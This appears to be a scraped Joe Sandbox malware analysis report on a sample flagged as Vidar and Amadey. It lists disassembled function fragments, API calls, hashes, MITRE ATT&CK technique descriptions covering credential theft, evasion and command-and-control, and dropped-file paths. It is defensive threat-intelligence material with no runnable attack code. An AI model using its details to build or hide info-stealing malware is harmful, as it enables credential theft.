Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: __calloc_crt
String ID: @b,
API String ID: 3494438863-3938988308
Opcode ID: f979d62db6beb160337dd6e912f4a33938719b386e62762cd19007afae9db695
Instruction ID: f92f4e530b7d55eb3a94be3d2491fa782dc4ae2dedcef339d75e78a4326ac23e
Opcode Fuzzy Hash: f979d62db6beb160337dd6e912f4a33938719b386e62762cd19007afae9db695
Instruction Fuzzy Hash: EDF0627336D227ABF7348FA9BC49FA57795E704720F1101BAF500DA294EB70C8A14E81

Function 002654E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00265501
_wcscmp.LIBCMT ref: 00265513

Strings

#32770, xrefs: 0026550D

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 336f0a340224889957fc3d115bf16fb6ba4cb02b6c1e128fe2ac94b2ef0a576d
Instruction ID: 83dfdd139056f1143e17b2e44487ba9f70d67496cb273ba616944db6778ad700
Opcode Fuzzy Hash: 336f0a340224889957fc3d115bf16fb6ba4cb02b6c1e128fe2ac94b2ef0a576d
Instruction Fuzzy Hash: EEE09B725002292BD7109A99BC49EE7F7ACDB55771F000057BD04D6151D5A0995587D0

Function 00258892 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 002588A0

Part of subcall function 00223588: _doexit.LIBCMT ref: 00223592

Strings

Error allocating memory., xrefs: 00258899
AutoIt, xrefs: 00258894

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: f1198e306497ba855940ee6f830a72c209c37cccb5b16a97605b04f9dfd82af2
Instruction ID: 59f582f36487ca57a2c4c73d7d708d62857ce35fc39e0e0e1e219f841d9923d3
Opcode Fuzzy Hash: f1198e306497ba855940ee6f830a72c209c37cccb5b16a97605b04f9dfd82af2
Instruction Fuzzy Hash: F8D012722A536C36D21476E47C0AFCA7A4C8B15B51F40442ABB08651C349D585F04595

Function 00240251 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 00240091

Part of subcall function 0027C6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,0024027A,?), ref: 0027C6E7
Part of subcall function 0027C6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0027C6F9

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00240289

Strings

WIN_XPe, xrefs: 002400A4

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: faebb10679efbe979dbb4ecfd396a0a73b04ca3da37fd81b96979266d52f682e
Instruction ID: 59a6d0961ba2952a2c05aeb85839ae97fe28423ab94f21e67f39e430b9985137
Opcode Fuzzy Hash: faebb10679efbe979dbb4ecfd396a0a73b04ca3da37fd81b96979266d52f682e
Instruction Fuzzy Hash: 71F0C071C25109DFCB19DF61D9D8BEC7BB8AB58304F245095E246A2190CBB15F94DF21

Function 00215800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19windowCOMMON

Download Yara Rule

APIs

DestroyIcon.USER32(,z,0z,,002C7A2C,002C7890,?,00215A53,002C7A2C,002C7A30,?,00000004), ref: 00215823

Strings

,z,0z,, xrefs: 00215808, 00215821
SZ!,z,0z,, xrefs: 00215804

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: DestroyIcon
String ID: ,z,0z,$SZ!,z,0z,
API String ID: 1234817797-3576169104
Opcode ID: eeee7c3dd63bbce5c288e5f636d7a53683909dc6b18bd352a19e264de32d8527
Instruction ID: 9991cabfb26780eb334a04415b538fc44578ad453eca070d70e872fb30b838cb
Opcode Fuzzy Hash: eeee7c3dd63bbce5c288e5f636d7a53683909dc6b18bd352a19e264de32d8527
Instruction Fuzzy Hash: 74E0C73202422BEFEB200F48E800BD4FBE8AFB1331F2580A6E08046060D3B168F0CB90

Function 00269EA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00269EB5
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00269ECC

Strings

aut, xrefs: 00269EC6

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: e6e4cf5656aea2bfb67efed2e78ea5bb2b03719f4cdadc103496c7f1323d3f4d
Instruction ID: 37d00899545c297ac1d36459382fd50c154a48b5303758f0e77196bb85182f64
Opcode Fuzzy Hash: e6e4cf5656aea2bfb67efed2e78ea5bb2b03719f4cdadc103496c7f1323d3f4d
Instruction Fuzzy Hash: 86D05B7594030D6FDB509B90EC4DFDB773CD704701F0042927E5C910A2DAB055948B91

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Vidar

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\EBGCFBGCBFHJ\AEHIDA

C:\ProgramData\EBGCFBGCBFHJ\CBGCAF

C:\ProgramData\EBGCFBGCBFHJ\CBKJJE

C:\ProgramData\EBGCFBGCBFHJ\CFHIIE

C:\ProgramData\EBGCFBGCBFHJ\CFHIIE-shm

C:\ProgramData\EBGCFBGCBFHJ\CFIIIJ

C:\ProgramData\EBGCFBGCBFHJ\DBKKFC

C:\ProgramData\EBGCFBGCBFHJ\DBKKFC-shm

C:\ProgramData\EBGCFBGCBFHJ\DGIJEG

Windows Analysis Report
file.exe

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre